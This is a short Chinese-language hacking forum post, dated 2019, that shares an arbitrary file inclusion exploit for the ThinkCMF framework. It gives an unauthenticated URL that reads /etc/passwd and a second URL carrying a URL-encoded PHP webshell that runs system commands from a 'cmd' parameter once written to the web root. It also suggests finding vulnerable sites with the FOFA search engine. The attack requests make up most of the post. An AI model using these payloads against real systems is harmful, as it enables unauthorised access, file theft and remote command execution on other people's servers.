搜索
    Hi~登录注册
    查看: 285|回复: 0
    收起左侧

    ThinkCMF 框架上的任意内容包含漏洞

    [复制链接]

    18

    主题

    0

    精华

    15 小时

    在线时间

    密圈

    积分
    16
    发表于 2019-10-28 15:28:15 | 显示全部楼层 |阅读模式

    ThinkCMF 框架上的任意内容包含漏洞

    消失了一段时间哈哈哈,学校任务比较多封闭了一段时间,刚被放出来。 再加上打了好几场比赛。终于抽时间可以写个文章了。 最新的ThinkCMF 框架上的任意内容包含漏洞 放出来给各位表哥一起学习。

    1. 未授权直接包含系统文件

    https://x.x.x.x/?a=display&templateFile=/etc/passwd

    QQ截图20191028152227.png 2. 利用文件包含写shell到网站根目录下面

    https://x.x.x.x/?a=fetch&templateFile=public/inde&prefix=%27%27&content=file_put_contents('0a30e0d61182dbb7c1eed5135787fb84.php','%3c%3f%70%68%70%0d%0a%65%63%68%6f%20%6d%64%35%28%22%54%68%69%6e%6b%43%4d%46%22%29%3b%0d%0a%20%20%20%20%69%66%28%69%73%73%65%74%28%24%5f%52%45%51%55%45%53%54%5b%22%63%6d%64%22%5d%29%29%7b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%65%63%68%6f%20%22%3c%70%72%65%3e%22%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%24%63%6d%64%20%3d%20%28%24%5f%52%45%51%55%45%53%54%5b%22%63%6d%64%22%5d%29%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%73%79%73%74%65%6d%28%24%63%6d%64%29%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%65%63%68%6f%20%22%3c%2f%70%72%65%3e%22%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%64%69%65%3b%0d%0a%20%20%20%20%7d%0d%0a%70%68%70%69%6e%66%6f%28%29%3b%0d%0a%3f%3e')

    QQ截图20191028152507.png

    1. 网站搜索方法直接fofa 搜

    QQ截图20191028152517.png

    回复

    使用道具 举报

    游客
    回复
    您需要登录后才可以回帖 登录 | 获取账号

    快速回复 返回顶部 返回列表